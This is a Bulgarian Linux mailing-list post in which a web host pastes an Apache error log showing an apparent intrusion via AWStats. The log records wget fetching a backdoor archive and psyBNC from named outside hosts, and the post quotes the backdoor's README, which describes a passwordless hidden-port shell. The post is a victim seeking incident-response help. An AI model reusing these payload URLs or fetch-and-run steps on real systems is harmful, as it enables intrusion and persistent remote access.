Здравейте :) хоствам няколко сайта и ползвам awstats от 2г. като трафик анализатор за моя лична информция.
Днес в 22:04 стартирах awstats за пореден път за да анализира логовете на апача. Съвсем случайно по това време бях пуснал следната команда: #tail -f /var/log/apache/* и наблюдавах активността на сайтовете... Малко след като стартирах awstats се появи следното в error.log файла: ==== cut ==== sh: line 1: /awstats.mydomain.com.conf: No such file or directory --22:04:48-- http://www.petry.se/public_html/tw.tar.gz => `tw.tar.gz' Resolving www.petry.se... done. Connecting to www.petry.se[195.47.247.72]:80... connected. HTTP request sent, awaiting response... 200 OK Length: 16,414 [application/x-tar] 0K .......... ...... 100% 141.85 KB/s 22:04:48 (141.85 KB/s) - `tw.tar.gz' saved [16414/16414] --22:04:51-- http://www.petry.se/public_html/tw.tar.gz => `tw.tar.gz' Resolving www.petry.se... done. Connecting to www.petry.se[195.47.247.72]:80... connected. HTTP request sent, awaiting response... 200 OK Length: 16,414 [application/x-tar] 0K .......... ...... 100% 130.32 KB/s 22:04:52 (130.32 KB/s) - `tw.tar.gz' saved [16414/16414] sh: line 1: cd: rw: No such file or directory sh: line 1: ./bind: No such file or directory sh: line 1: fg: no job control --22:06:03-- http://geocities.com/sickady/p.tgz => `p.tgz' Resolving geocities.com... done. Connecting to geocities.com[66.218.77.68]:80... connected. HTTP request sent, awaiting response... 200 OK Length: 605,272 [application/x-compressed] 0K .......... .......... .......... .......... .......... 8% 81.83 KB/s 50K .......... .......... .......... .......... .......... 16% 235.85 KB/s 100K .......... .......... .......... .......... .......... 25% 253.81 KB/s 150K .......... .......... .......... .......... .......... 33% 242.72 KB/s 200K .......... .......... .......... .......... .......... 42% 248.76 KB/s 250K .......... .......... .......... .......... .......... 50% 250.00 KB/s 300K .......... .......... .......... .......... .......... 59% 2.33 MB/s 350K .......... .......... .......... .......... .......... 67% 240.38 KB/s 400K .......... .......... .......... .......... .......... 76% 252.53 KB/s 450K .......... .......... .......... .......... .......... 84% 255.10 KB/s 500K .......... .......... .......... .......... .......... 93% 253.81 KB/s 550K .......... .......... .......... .......... . 100% 25.04 KB/s 22:06:08 (144.59 KB/s) - `p.tgz' saved [605272/605272] tools/convconf.c: In function `cofile': tools/convconf.c:81: warning: deprecated use of label at end of compound statement gcc: installation problem, cannot exec `as': No such file or directory make: *** [all] Error 1 ./psybnc: error while loading shared libraries: libssl.so.0.9.6: cannot open shared object file: No such file or directory sh: line 1: fg: no job control --22:09:15-- http://geocities.com/sickady/p.tgz => `p.tgz' Resolving geocities.com... done. Connecting to geocities.com[66.218.77.68]:80... connected. HTTP request sent, awaiting response... 200 OK Length: 605,272 [application/x-compressed] 0K .......... .......... .......... .......... .......... 8% 78.49 KB/s 50K .......... .......... .......... .......... .......... 16% 231.48 KB/s 100K .......... .......... .......... .......... .......... 25% 236.97 KB/s 150K .......... .......... .......... .......... .......... 33% 239.23 KB/s 200K .......... .......... .......... .......... .......... 42% 238.10 KB/s 250K .......... .......... .......... .......... .......... 50% 240.38 KB/s 300K .......... .......... .......... .......... .......... 59% 2.12 MB/s 350K .......... .......... .......... .......... .......... 67% 233.64 KB/s 400K .......... .......... .......... .......... .......... 76% 238.10 KB/s 450K .......... .......... .......... .......... .......... 84% 252.53 KB/s 500K .......... .......... .......... .......... .......... 93% 255.10 KB/s 550K .......... .......... .......... .......... . 100% 1.11 MB/s 22:09:18 (230.17 KB/s) - `p.tgz' saved [605272/605272] ./psybnc: error while loading shared libraries: libssl.so.0.9.6: cannot open shared object file: No such file or directory sh: line 1: fg: no job control ==== /cut ==== Сами виждате - нещо изтегли и се опита да инсталира следните пакети при това по 2 пъти: 1. http://www.petry.se/public_html/tw.tar.gz 2. http://geocities.com/sickady/p.tgz Аз смятам че има връзка с awstats защотото, освен че се появи малко след стартиране на австатс (няколко секунди), забележете ред 1 от това което Ви пейстнах: sh: line 1: /awstats.mydomain.com.conf: No such file or directory Какво е това? Задна врата в австатс? или уязвимост в австатс? аз изтеглих въпросните 2 пакета и в README файла на tw.tar.gz пише следното: 59768 port backdoor no password needed , easy to install and hiding from ps and ps ax:D have phun ! wget at home.ro Другия пакет се оказа че е psybnc. Незнам за какво служи. То и от последния ред който пейстнах там по-горе се вижда това: ./psybnc: error while loading shared libraries: libssl.so.0.9.6: cannot open shared object file: No such file or directory sh: line 1: fg: no job control Всичко това стана пред очите ми. изпълних updatedb locate psybnc locate p.tgz locate tw.tar.gz locate tools/convconf.c locate convconf.c и никоя от тях не намери нищо. в логовете открих точно по същото време изпратени 2 мейла: from <[EMAIL PROTECTED]> to remote [EMAIL PROTECTED] from <[EMAIL PROTECTED]> to remote [EMAIL PROTECTED] Търсих, рових.... не намерих нищо друго подозрително! Сървъра е apache 1.3.33 Вие какво мислите? как да процедирам? Благодаря за помощта! ----------------------------------------------------------------- http://gbg.bg/search - Изпробвайте още сега най-добрата българска търсачка! ============================================================================ A mail-list of Linux Users Group - Bulgaria (bulgarian linuxers). http://www.linux-bulgaria.org - Hosted by Internet Group Ltd. - Stara Zagora To unsubscribe: http://www.linux-bulgaria.org/public/mail_list.html ============================================================================
